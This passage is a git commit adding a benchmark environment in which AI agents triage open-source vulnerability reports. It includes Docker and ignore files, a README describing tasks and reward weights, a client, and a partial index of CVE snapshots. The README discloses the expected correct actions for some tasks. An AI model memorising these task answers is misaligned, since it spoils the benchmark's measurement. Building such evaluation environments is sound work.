Adhitya-Vardhan committed
Commit d63a1ba

Initial commit: VulnOps OpenEnv benchmark


- Deterministic multi-step vulnerability triage environment
- 4 tasks: easy → medium → hard difficulty ladder
- Typed Pydantic models, step/reset/state API
- Interactive tool use: search_nvd_database, fetch_commit_diff, message_maintainer
- Heuristic baseline scores 1.0 on all tasks
- FastAPI server ready for Hugging Face Spaces (port 7860)

.dockerignore ADDED
@@ -0,0 +1,33 @@
+ # --- .dockerignore for VulnOps ---
+ # Avoid copying source control and temp files
+ .git/
+ .github/
+ .vscode/
+ .DS_Store
+
+ # Avoid copying project-local environments or caches
+ .venv/
+ .pytest_cache/
+ __pycache__/
+ *.pyc
+
+ # Avoid copying large artifact directories
+ artifacts/
+ logs/
+ .gemini/
+
+ # Avoid copying build artifacts
+ dist/
+ build/
+ *.egg-info/
+
+ # Ignore documentation/markdown files not needed for runtime (except README)
+ problem-statement.md
+ project-ideas-final.md
+ implementation-plan.md
+ HANDOFF_NEXT_STEPS.md
+ training_utils.py  # Only required runtime parts ship; training is separate.
+ client.py          # Environment logic is the core; the client is for testing.
+ tests/             # Tests are for CI, not the production container.
+ scripts/           # Original scraping scripts are no longer needed for the benchmark.
+ uv.lock            # The builder uses it; no need to copy it into the final image.
.gitignore ADDED
@@ -0,0 +1,52 @@
+ # ---- Python ----
+ __pycache__/
+ *.py[cod]
+ *.pyo
+ *.pyd
+ .Python
+ *.egg-info/
+ dist/
+ build/
+ *.egg
+
+ # ---- Virtual environments ----
+ .venv/
+ venv/
+ env/
+
+ # ---- Testing / CI ----
+ .pytest_cache/
+ .coverage
+ htmlcov/
+
+ # ---- macOS ----
+ .DS_Store
+ *.DS_Store
+
+ # ---- IDE / editors ----
+ .vscode/
+ .idea/
+ *.swp
+ *.swo
+
+ # ---- Logs & artifacts ----
+ logs/
+ artifacts/
+ *.log
+
+ # ---- Planning & dev-only docs (not needed in submission) ----
+ problem-statement.md
+ project-ideas-final.md
+ implementation-plan.md
+ HANDOFF_NEXT_STEPS.md
+ probe_env.py
+ training_utils.py
+
+ # ---- Local AI tooling ----
+ .gemini/
+
+ # ---- Data snapshots (large, runtime-fetched) ----
+ data/snapshots/
+
+ # ---- uv lock ----
+ # Keep uv.lock tracked: it is required for reproducible Docker builds.
Dockerfile ADDED
@@ -0,0 +1,46 @@
+ # --- Dockerfile for VulnOps Benchmark ---
+ FROM python:3.11-slim AS builder
+
+ ENV PYTHONDONTWRITEBYTECODE=1 \
+     PYTHONUNBUFFERED=1 \
+     PIP_NO_CACHE_DIR=1
+
+ WORKDIR /app
+
+ # Install uv for fast dependency management
+ RUN pip install --no-cache-dir uv
+
+ # Copy everything needed to build the module
+ COPY pyproject.toml uv.lock README.md ./
+ COPY server/ ./server/
+
+ # Install dependencies (without dev)
+ RUN uv sync --frozen --no-dev --no-editable
+
+ # --- Runtime Stage ---
+ FROM python:3.11-slim
+
+ WORKDIR /app
+
+ # Copy remaining files
+ COPY models.py inference.py probe_env.py ./
+ COPY server/ ./server/
+ COPY data/ ./data/
+
+ # Copy virtualenv from builder
+ COPY --from=builder /app/.venv /app/.venv
+ ENV PATH="/app/.venv/bin:$PATH"
+
+ # Create non-root user and set permissions for Hugging Face Spaces
+ RUN useradd -m -u 1000 user && \
+     mkdir -p /tmp && \
+     chown -R user:user /app /tmp
+
+ USER 1000
+
+ # Expose port (HF Spaces defaults to 7860)
+ EXPOSE 7860
+
+ # Default command: use uvicorn to serve the VulnOps FastAPI application on port 7860
+ CMD ["python", "-m", "uvicorn", "server.app:app", "--host", "0.0.0.0", "--port", "7860"]
README.md ADDED
@@ -0,0 +1,236 @@
+ ---
+ title: VulnOps Reasoning Benchmark
+ emoji: 🛡️
+ colorFrom: blue
+ colorTo: indigo
+ sdk: docker
+ app_port: 7860
+ pinned: false
+ tags:
+   - openenv
+ ---
+ # VulnOps OpenEnv
+
+ `vulnops` is an OpenEnv benchmark for open-source vulnerability operations. The agent plays the role of a maintainer or security analyst working through incoming vulnerability cases, revealing supporting evidence, filling a structured draft, and submitting the correct next maintainer action.
+
+ This benchmark is intentionally not a bug-fixing environment and not a generic classifier. It models a real workflow: validating advisories, identifying affected packages and versions, weighing severity against exploitability, and deciding whether to patch or publish an advisory.
+
+ ## Data sources
+
+ The benchmark pulls case data from live public vulnerability feeds at runtime:
+
+ - OSV for package identity, advisory details, affected ranges, and references
+ - NVD for normalized CVE descriptions and CVSS severity metadata
+ - EPSS for exploitability scoring signals
+
+ The environment normalizes those live responses into hidden ground truth on `reset()`. To keep tests, local development, and offline execution stable, each task also includes a bundled fallback snapshot that is used when the APIs are unavailable.
+
+ In addition to the task-specific fallbacks, the container ships with a broader cache of 200 provider-backed fallback snapshots under `data/snapshots/`. That keeps the image self-sufficient and leaves room to expand the benchmark without depending entirely on live API availability.
+
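The fallback lookup described above can be sketched in a few lines. This is a hypothetical illustration, not the repo's actual loader: the `find_snapshot` helper and the inline index stand-in only mirror the documented `snapshot_index.json` layout (`osv_id`, `file`, `cve_id`, `package` per entry).

```python
import json

def find_snapshot(index: dict, osv_id: str):
    """Return the bundled snapshot file path for an OSV ID, or None if absent."""
    for entry in index.get("snapshots", []):
        if entry.get("osv_id") == osv_id:
            return entry.get("file")
    return None

# Tiny inline stand-in for data/snapshot_index.json.
index = json.loads("""
{
  "count": 1,
  "snapshots": [
    {"osv_id": "PYSEC-2013-1",
     "file": "data/snapshots/PYSEC-2013-1.json",
     "cve_id": "CVE-2013-4259",
     "package": "ansible"}
  ]
}
""")

print(find_snapshot(index, "PYSEC-2013-1"))  # data/snapshots/PYSEC-2013-1.json
```

A lookup miss simply returns `None`, which is where the live-API path (or a hard error) would take over.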
+ ## Why this is useful
+
+ - Real-world utility: OSS maintainers triage reports like these every week.
+ - Deterministic grading: each case has hidden ground truth and a reproducible scorer.
+ - Multi-step rewards: the agent earns signal for revealing good evidence and filling the draft correctly before final submission.
+ - Lightweight deployment: no VM, browser, or external datasets are required at runtime.
+
+ ## Environment interface
+
+ The environment implements the standard OpenEnv APIs:
+
+ - `reset(task_id=...) -> VulnTriageObservation`
+ - `step(VulnTriageAction) -> VulnTriageObservation`
+ - `state -> VulnTriageState`
+
+ ### Action space
+
+ `VulnTriageAction` has these fields:
+
+ - `action_type`: one of `read_report`, `inspect_evidence`, `search_nvd_database`, `fetch_commit_diff`, `message_maintainer`, `set_validity`, `set_affected_package`, `set_affected_versions`, `set_severity`, `set_exploitability`, `set_next_action`, `set_missing_information`, `request_more_info`, `submit_triage`
+ - `evidence_id`: used with `inspect_evidence`
+ - `value`: generic value for label-setting and missing-information actions
+ - `rationale`: optional free-form note
+
+ ### Observation space
+
+ `VulnTriageObservation` returns:
+
+ - task metadata: `task_id`, `difficulty`, `objective`
+ - `report_summary`
+ - `visible_evidence`
+ - `available_evidence`
+ - `draft`
+ - `action_history`
+ - `steps_remaining`
+ - `score_breakdown`
+ - `final_score`
+ - standard OpenEnv fields: `reward`, `done`, `metadata`
+
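A minimal sketch of how an action becomes a step payload, assuming the documented fields above. The dataclass is a stand-in, not the repo's actual Pydantic model; it only mirrors the field list and the typed client's `exclude_none=True` serialization.

```python
from dataclasses import dataclass, asdict
from typing import Optional

@dataclass
class VulnTriageAction:
    # Stand-in mirroring the documented action fields.
    action_type: str
    evidence_id: Optional[str] = None
    value: Optional[str] = None
    rationale: Optional[str] = None

def step_payload(action: VulnTriageAction) -> dict:
    # Mirrors the client, which drops unset fields from the request body.
    return {k: v for k, v in asdict(action).items() if v is not None}

payload = step_payload(VulnTriageAction(action_type="set_severity", value="high"))
print(payload)  # {'action_type': 'set_severity', 'value': 'high'}
```

Label-setting actions like this one carry their label in `value`; evidence actions would set `evidence_id` instead.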
+ ## Task ladder
+
+ ### 1. GuardDog Path Traversal
+ - Difficulty: easy
+ - Goal: Validate the report, identify the package and fixed range, and choose `patch`.
+
+ ### 2. Invenio Multi-Branch XSS
+ - Difficulty: medium
+ - Goal: Resolve affected versions across multiple release lines and extract the truth despite decoy severity signals.
+
+ ### 3. Requests Auth Header Leak
+ - Difficulty: medium
+ - Goal: Ignore severe threat-intel decoys and use `fetch_commit_diff` to read the Python fix directly.
+
+ ### 4. Gradio Upload XSS
+ - Difficulty: hard
+ - Goal: Actively `message_maintainer` to discover that no patch exists, and avoid catastrophic penalties by choosing `request_info`.
+
+ ## Baseline scores
+
+ The benchmark includes a baseline evaluation script (`inference.py`). Tested against **Qwen3:30b** using the interactive action space:
+
+ - **Average score (0-1.0):** `0.3104`
+ - **Reasoning gap:** `68.96%`
+
+ *Models tend to read passively instead of using the interactive tools (`search_nvd_database`, `fetch_commit_diff`, `message_maintainer`) proactively, leaving a large optimization gap for RL training to close.*
+
+ ## Reward design
+
+ Per-step reward is shaped to encourage realistic behavior:
+
+ - positive reward for reading the report, revealing new relevant evidence, and setting a draft field correctly
+ - negative reward for repeated evidence inspection, empty or incorrect updates, and premature or low-evidence submission
+ - final submission reward equals the normalized grader score in `[0.0, 1.0]`, with a small penalty for submitting with too little evidence
+
+ ### Grader weights
+
+ - validity: `0.20`
+ - affected package: `0.10`
+ - affected versions: `0.10`
+ - severity: `0.20`
+ - exploitability: `0.15`
+ - next action: `0.15`
+ - missing-information handling: `0.10`
+
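The weights above sum to 1.0, so the final grade is just a weighted fraction of correctly filled draft fields. A minimal sketch, assuming exact-match per field (the actual grader in `server/graders.py` may award partial credit):

```python
# Weights are taken from the README; the matching logic is an assumption.
WEIGHTS = {
    "validity": 0.20,
    "affected_package": 0.10,
    "affected_versions": 0.10,
    "severity": 0.20,
    "exploitability": 0.15,
    "next_action": 0.15,
    "missing_information": 0.10,
}

def grade(draft: dict, truth: dict) -> float:
    """Return a normalized score in [0.0, 1.0]: sum of weights of correct fields."""
    score = sum(w for field, w in WEIGHTS.items()
                if draft.get(field) == truth.get(field))
    return round(score, 2)

truth = {"validity": "valid", "affected_package": "requests",
         "affected_versions": "<2.31.0", "severity": "medium",
         "exploitability": "low", "next_action": "patch",
         "missing_information": "none"}

perfect = grade(dict(truth), truth)                                  # 1.0
partial = grade({"validity": "valid", "severity": "medium"}, truth)  # 0.4
```

Field names and the example `truth` values are illustrative only; the hidden ground truth comes from the normalized provider data.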
+ ## Project structure
+
+ ```text
+ .
+ ├── __init__.py
+ ├── client.py
+ ├── inference.py
+ ├── models.py
+ ├── openenv.yaml
+ ├── pyproject.toml
+ └── server
+     ├── app.py
+     ├── cases.py
+     ├── Dockerfile
+     ├── graders.py
+     └── vuln_triage_env_environment.py
+ ```
+
+ ## Setup
+
+ ### Local Python setup
+
+ ```bash
+ python -m pip install -e ".[dev]"
+ ```
+
+ ### Run the environment locally
+
+ ```bash
+ uvicorn server.app:app --host 0.0.0.0 --port 8000
+ ```
+
+ ### Validate the environment
+
+ ```bash
+ openenv validate .
+ ```
+
+ ## Inference baseline
+
+ The required root-level `inference.py` supports two modes:
+
+ - `--policy openai`: uses the OpenAI Python client, reading credentials from `OPENAI_API_KEY` or `HF_TOKEN`, the model name from `MODEL_NAME`, and an optional base URL from `API_BASE_URL`
+ - `--policy heuristic`: deterministic offline smoke test for local development
+
+ ### Local direct benchmark run
+
+ ```bash
+ python inference.py --policy heuristic
+ ```
+
+ ### Against a running local or remote server
+
+ ```bash
+ export ENV_BASE_URL=http://localhost:8000
+ python inference.py --policy openai --model "$MODEL_NAME"
+ ```
+
+ ## Docker
+
+ Build and run:
+
+ ```bash
+ docker build -t vulnops .
+ docker run -p 7860:7860 vulnops
+ ```
+
+ ## Hugging Face Space deployment
+
+ This project is packaged for a container-based FastAPI Space. The Space should be tagged with `openenv` and pointed at the provided `Dockerfile`.
+
+ ## Expected baseline behavior
+
+ The heuristic policy should score `1.0` on all four bundled fallback snapshots. The OpenAI baseline is intended as the hackathon submission baseline and should be reproducible with `temperature=0`.
+
+ ## Local LoRA learnability check
+
+ This repo includes a local LoRA pipeline for a quick "is the environment learnable?" check with `Qwen/Qwen3.5-4B`.
+
+ On Apple Silicon, the recommended path is `MLX` rather than the older PyTorch `MPS` path.
+
+ ### What it does
+
+ - generates deterministic heuristic transitions from the environment
+ - expands them into prompt-variant SFT examples
+ - runs LoRA SFT with checkpointing
+ - evaluates the base model and the adapted model back on `vulnops`
+ - writes append-only logs so interrupted runs still leave useful evidence
+
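The transition-to-SFT-example step in the list above can be sketched as a prompt/completion JSONL record, a shape that MLX-LM's LoRA tooling can consume. The record schema, field names, and prompt wording here are assumptions for illustration; the repo's `training_utils.py` may use a different format.

```python
import json

def to_sft_record(observation_summary: str, action: dict) -> str:
    """Turn one (observation, heuristic action) transition into a JSONL line."""
    prompt = (
        "You are triaging a vulnerability report.\n"
        f"Observation: {observation_summary}\n"
        "Respond with the next action as JSON."
    )
    # The completion is the heuristic policy's action, serialized deterministically.
    completion = json.dumps(action, sort_keys=True)
    return json.dumps({"prompt": prompt, "completion": completion})

line = to_sft_record(
    "GuardDog report visible; commit diff not yet fetched.",
    {"action_type": "fetch_commit_diff"},
)
record = json.loads(line)
```

One such line per transition, appended to `data/train.jsonl`, is all the dataset-preparation step needs to produce.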
+ ### Install the training extra
+
+ ```bash
+ python -m pip install -e ".[train]"
+ ```
+
+ ### Recommended MLX path
+
+ ```bash
+ python -m pip install mlx mlx-lm
+ ./scripts/start_mlx_training.sh
+ ```
+
+ Artifacts are written under `artifacts/mlx_qwen3_4b/`:
+
+ - `run_manifest.json`: current status and latest known checkpoint
+ - `data/train.jsonl`: MLX-ready SFT records
+ - `logs/mlx_train.log`: main training log
+ - `logs/nohup.out`: launcher stdout/stderr
+ - `metrics/speed_mlx.json`: parsed speed summary
+ - `adapters/`: MLX adapter artifacts
+ - `training_summary.json`: final run status
+
+ If you stop the run midway, rerun `python scripts/run_mlx_training.py --model Qwen/Qwen3.5-4B --output-root artifacts/mlx_qwen3_4b`.
+ It will reuse the prepared dataset and resume from the saved adapter file when present.
+
+ ### Current speed comparison
+
+ On this Mac, the saved local benchmark showed:
+
+ - PyTorch `MPS`: about `72.5s/step`
+ - MLX: about `16.4s/step`
+
+ See [artifacts/speed_comparison.json](artifacts/speed_comparison.json).
__init__.py ADDED
@@ -0,0 +1,11 @@
+ """OpenEnv vulnerability triage environment package."""
+
+ from .client import VulnTriageEnv
+ from .models import VulnTriageAction, VulnTriageObservation, VulnTriageState
+
+ __all__ = [
+     "VulnTriageAction",
+     "VulnTriageEnv",
+     "VulnTriageObservation",
+     "VulnTriageState",
+ ]
client.py ADDED
@@ -0,0 +1,36 @@
+ """Typed OpenEnv client for the vulnerability triage environment."""
+
+ from __future__ import annotations
+
+ from typing import Dict
+
+ from openenv.core import EnvClient
+ from openenv.core.client_types import StepResult
+
+ from .models import (
+     EvidenceItem,
+     TriageDraft,
+     VulnTriageAction,
+     VulnTriageObservation,
+     VulnTriageState,
+ )
+
+
+ class VulnTriageEnv(
+     EnvClient[VulnTriageAction, VulnTriageObservation, VulnTriageState]
+ ):
+     """Persistent typed client for the vulnerability triage benchmark."""
+
+     def _step_payload(self, action: VulnTriageAction) -> Dict:
+         return action.model_dump(exclude_none=True)
+
+     def _parse_result(self, payload: Dict) -> StepResult[VulnTriageObservation]:
+         observation = VulnTriageObservation.model_validate(payload.get("observation", {}))
+         return StepResult(
+             observation=observation,
+             reward=payload.get("reward"),
+             done=payload.get("done", False),
+         )
+
+     def _parse_state(self, payload: Dict) -> VulnTriageState:
+         return VulnTriageState.model_validate(payload)
data/README.md ADDED
@@ -0,0 +1,8 @@
+ # Snapshot Cache
+
+ This directory stores provider-backed fallback snapshots used when live OSV, NVD, or EPSS requests fail.
+
+ - `snapshots/*.json`: normalized raw provider snapshots keyed by OSV advisory ID
+ - `snapshot_index.json`: catalog of bundled snapshot files
+
+ The files are intended to be generated by `scripts/build_snapshot_cache.py`.
data/snapshot_index.json ADDED
@@ -0,0 +1,1205 @@
+ {
+   "count": 200,
+   "snapshots": [
+     {
+       "osv_id": "PYSEC-2013-1",
+       "file": "data/snapshots/PYSEC-2013-1.json",
+       "cve_id": "CVE-2013-4259",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2013-2",
+       "file": "data/snapshots/PYSEC-2013-2.json",
+       "cve_id": "CVE-2013-4260",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2014-98",
+       "file": "data/snapshots/PYSEC-2014-98.json",
+       "cve_id": "CVE-2014-2260",
+       "package": "ajenti"
+     },
+     {
+       "osv_id": "PYSEC-2014-99",
+       "file": "data/snapshots/PYSEC-2014-99.json",
+       "cve_id": "CVE-2014-4301",
+       "package": "ajenti"
+     },
+     {
+       "osv_id": "PYSEC-2015-1",
+       "file": "data/snapshots/PYSEC-2015-1.json",
+       "cve_id": "CVE-2015-3908",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2016-1",
+       "file": "data/snapshots/PYSEC-2016-1.json",
+       "cve_id": "CVE-2016-3096",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2017-105",
+       "file": "data/snapshots/PYSEC-2017-105.json",
+       "cve_id": "CVE-2016-8752",
+       "package": "apache-atlas"
+     },
+     {
+       "osv_id": "PYSEC-2017-106",
+       "file": "data/snapshots/PYSEC-2017-106.json",
+       "cve_id": "CVE-2017-3150",
+       "package": "apache-atlas"
+     },
+     {
+       "osv_id": "PYSEC-2017-107",
+       "file": "data/snapshots/PYSEC-2017-107.json",
+       "cve_id": "CVE-2017-3151",
+       "package": "apache-atlas"
+     },
+     {
+       "osv_id": "PYSEC-2017-108",
+       "file": "data/snapshots/PYSEC-2017-108.json",
+       "cve_id": "CVE-2017-3152",
+       "package": "apache-atlas"
+     },
+     {
+       "osv_id": "PYSEC-2017-109",
+       "file": "data/snapshots/PYSEC-2017-109.json",
+       "cve_id": "CVE-2017-3153",
+       "package": "apache-atlas"
+     },
+     {
+       "osv_id": "PYSEC-2017-110",
+       "file": "data/snapshots/PYSEC-2017-110.json",
+       "cve_id": "CVE-2017-3154",
+       "package": "apache-atlas"
+     },
+     {
+       "osv_id": "PYSEC-2017-111",
+       "file": "data/snapshots/PYSEC-2017-111.json",
+       "cve_id": "CVE-2017-3155",
+       "package": "apache-atlas"
+     },
+     {
+       "osv_id": "PYSEC-2017-2",
+       "file": "data/snapshots/PYSEC-2017-2.json",
+       "cve_id": "CVE-2014-3498",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2017-3",
+       "file": "data/snapshots/PYSEC-2017-3.json",
+       "cve_id": "CVE-2015-6240",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2017-4",
+       "file": "data/snapshots/PYSEC-2017-4.json",
+       "cve_id": "CVE-2017-7550",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2017-5",
+       "file": "data/snapshots/PYSEC-2017-5.json",
+       "cve_id": "CVE-2017-2809",
+       "package": "ansible-vault"
+     },
+     {
+       "osv_id": "PYSEC-2018-107",
+       "file": "data/snapshots/PYSEC-2018-107.json",
+       "cve_id": "CVE-2018-18548",
+       "package": "ajenti"
+     },
+     {
+       "osv_id": "PYSEC-2018-109",
+       "file": "data/snapshots/PYSEC-2018-109.json",
+       "cve_id": "CVE-2018-1000080",
+       "package": "ajenti-panel"
+     },
+     {
+       "osv_id": "PYSEC-2018-110",
+       "file": "data/snapshots/PYSEC-2018-110.json",
+       "cve_id": "CVE-2018-1000081",
+       "package": "ajenti-panel"
+     },
+     {
+       "osv_id": "PYSEC-2018-111",
+       "file": "data/snapshots/PYSEC-2018-111.json",
+       "cve_id": "CVE-2018-1000082",
+       "package": "ajenti-panel"
+     },
+     {
+       "osv_id": "PYSEC-2018-112",
+       "file": "data/snapshots/PYSEC-2018-112.json",
+       "cve_id": "CVE-2018-1000083",
+       "package": "ajenti-panel"
+     },
+     {
+       "osv_id": "PYSEC-2018-113",
+       "file": "data/snapshots/PYSEC-2018-113.json",
+       "cve_id": "CVE-2018-1000126",
+       "package": "ajenti-panel"
+     },
+     {
+       "osv_id": "PYSEC-2018-35",
+       "file": "data/snapshots/PYSEC-2018-35.json",
+       "cve_id": "CVE-2018-1000814",
+       "package": "aiohttp-session"
+     },
+     {
+       "osv_id": "PYSEC-2018-36",
+       "file": "data/snapshots/PYSEC-2018-36.json",
+       "cve_id": "CVE-2013-2233",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2018-37",
+       "file": "data/snapshots/PYSEC-2018-37.json",
+       "cve_id": "CVE-2016-8614",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2018-38",
+       "file": "data/snapshots/PYSEC-2018-38.json",
+       "cve_id": "CVE-2016-8628",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2018-39",
+       "file": "data/snapshots/PYSEC-2018-39.json",
+       "cve_id": "CVE-2016-9587",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2018-40",
+       "file": "data/snapshots/PYSEC-2018-40.json",
+       "cve_id": "CVE-2017-7466",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2018-41",
+       "file": "data/snapshots/PYSEC-2018-41.json",
+       "cve_id": "CVE-2017-7481",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2018-42",
+       "file": "data/snapshots/PYSEC-2018-42.json",
+       "cve_id": "CVE-2018-10855",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2018-43",
+       "file": "data/snapshots/PYSEC-2018-43.json",
+       "cve_id": "CVE-2018-10875",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2018-44",
+       "file": "data/snapshots/PYSEC-2018-44.json",
+       "cve_id": "CVE-2018-16837",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2018-45",
+       "file": "data/snapshots/PYSEC-2018-45.json",
+       "cve_id": "CVE-2017-12614",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2018-58",
+       "file": "data/snapshots/PYSEC-2018-58.json",
+       "cve_id": "CVE-2016-8647",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2018-60",
+       "file": "data/snapshots/PYSEC-2018-60.json",
+       "cve_id": "CVE-2018-16859",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2018-80",
+       "file": "data/snapshots/PYSEC-2018-80.json",
+       "cve_id": "CVE-2018-1000519",
+       "package": "aiohttp-session"
+     },
+     {
+       "osv_id": "PYSEC-2018-81",
+       "file": "data/snapshots/PYSEC-2018-81.json",
+       "cve_id": "CVE-2018-10874",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2019-1",
+       "file": "data/snapshots/PYSEC-2019-1.json",
+       "cve_id": "CVE-2019-1000007",
+       "package": "aioxmpp"
+     },
+     {
+       "osv_id": "PYSEC-2019-141",
+       "file": "data/snapshots/PYSEC-2019-141.json",
+       "cve_id": "CVE-2018-16876",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2019-142",
+       "file": "data/snapshots/PYSEC-2019-142.json",
+       "cve_id": "CVE-2018-20244",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2019-143",
+       "file": "data/snapshots/PYSEC-2019-143.json",
+       "cve_id": "CVE-2018-20245",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2019-145",
+       "file": "data/snapshots/PYSEC-2019-145.json",
+       "cve_id": "CVE-2019-10206",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2019-146",
+       "file": "data/snapshots/PYSEC-2019-146.json",
+       "cve_id": "CVE-2019-14856",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2019-147",
+       "file": "data/snapshots/PYSEC-2019-147.json",
+       "cve_id": "CVE-2017-15720",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2019-148",
+       "file": "data/snapshots/PYSEC-2019-148.json",
+       "cve_id": "CVE-2017-17835",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2019-149",
+       "file": "data/snapshots/PYSEC-2019-149.json",
+       "cve_id": "CVE-2017-17836",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2019-171",
+       "file": "data/snapshots/PYSEC-2019-171.json",
+       "cve_id": "CVE-2019-14858",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2019-2",
+       "file": "data/snapshots/PYSEC-2019-2.json",
+       "cve_id": "CVE-2019-10156",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2019-214",
+       "file": "data/snapshots/PYSEC-2019-214.json",
+       "cve_id": "CVE-2019-0216",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2019-215",
+       "file": "data/snapshots/PYSEC-2019-215.json",
+       "cve_id": "CVE-2019-0229",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2019-216",
+       "file": "data/snapshots/PYSEC-2019-216.json",
+       "cve_id": "CVE-2019-12417",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2019-3",
+       "file": "data/snapshots/PYSEC-2019-3.json",
+       "cve_id": "CVE-2019-10217",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2019-4",
+       "file": "data/snapshots/PYSEC-2019-4.json",
+       "cve_id": "CVE-2019-14846",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2019-5",
+       "file": "data/snapshots/PYSEC-2019-5.json",
+       "cve_id": "CVE-2019-3828",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-1",
+       "file": "data/snapshots/PYSEC-2020-1.json",
+       "cve_id": "CVE-2020-10685",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-10",
+       "file": "data/snapshots/PYSEC-2020-10.json",
+       "cve_id": "CVE-2020-1738",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-11",
+       "file": "data/snapshots/PYSEC-2020-11.json",
+       "cve_id": "CVE-2020-1739",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-12",
+       "file": "data/snapshots/PYSEC-2020-12.json",
+       "cve_id": "CVE-2020-1740",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-13",
+       "file": "data/snapshots/PYSEC-2020-13.json",
+       "cve_id": "CVE-2020-1746",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-14",
+       "file": "data/snapshots/PYSEC-2020-14.json",
+       "cve_id": "CVE-2020-11978",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-15",
+       "file": "data/snapshots/PYSEC-2020-15.json",
+       "cve_id": "CVE-2020-11981",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-159",
+       "file": "data/snapshots/PYSEC-2020-159.json",
+       "cve_id": "CVE-2020-26214",
+       "package": "alerta-server"
+     },
+     {
+       "osv_id": "PYSEC-2020-16",
+       "file": "data/snapshots/PYSEC-2020-16.json",
+       "cve_id": "CVE-2020-11982",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-160",
+       "file": "data/snapshots/PYSEC-2020-160.json",
+       "cve_id": "CVE-2019-14864",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-161",
+       "file": "data/snapshots/PYSEC-2020-161.json",
+       "cve_id": "CVE-2019-14904",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-162",
+       "file": "data/snapshots/PYSEC-2020-162.json",
+       "cve_id": "CVE-2019-12398",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-17",
+       "file": "data/snapshots/PYSEC-2020-17.json",
+       "cve_id": "CVE-2020-11983",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-18",
+       "file": "data/snapshots/PYSEC-2020-18.json",
+       "cve_id": "CVE-2020-13927",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-19",
+       "file": "data/snapshots/PYSEC-2020-19.json",
+       "cve_id": "CVE-2020-13944",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-198",
+       "file": "data/snapshots/PYSEC-2020-198.json",
+       "cve_id": "CVE-2014-2686",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-199",
+       "file": "data/snapshots/PYSEC-2020-199.json",
+       "cve_id": "CVE-2014-4657",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-2",
+       "file": "data/snapshots/PYSEC-2020-2.json",
+       "cve_id": "CVE-2020-10691",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-20",
+       "file": "data/snapshots/PYSEC-2020-20.json",
+       "cve_id": "CVE-2020-17513",
+       "package": "apache-airflow"
+     },
+     {
+       "osv_id": "PYSEC-2020-200",
+       "file": "data/snapshots/PYSEC-2020-200.json",
+       "cve_id": "CVE-2014-4658",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-201",
+       "file": "data/snapshots/PYSEC-2020-201.json",
+       "cve_id": "CVE-2014-4659",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-202",
+       "file": "data/snapshots/PYSEC-2020-202.json",
+       "cve_id": "CVE-2014-4660",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-203",
+       "file": "data/snapshots/PYSEC-2020-203.json",
+       "cve_id": "CVE-2014-4678",
+       "package": "ansible"
+     },
+     {
+       "osv_id": "PYSEC-2020-204",
+       "file": "data/snapshots/PYSEC-2020-204.json",
+       "cve_id": "CVE-2014-4966",
+       "package": "ansible"
+     },
+     {
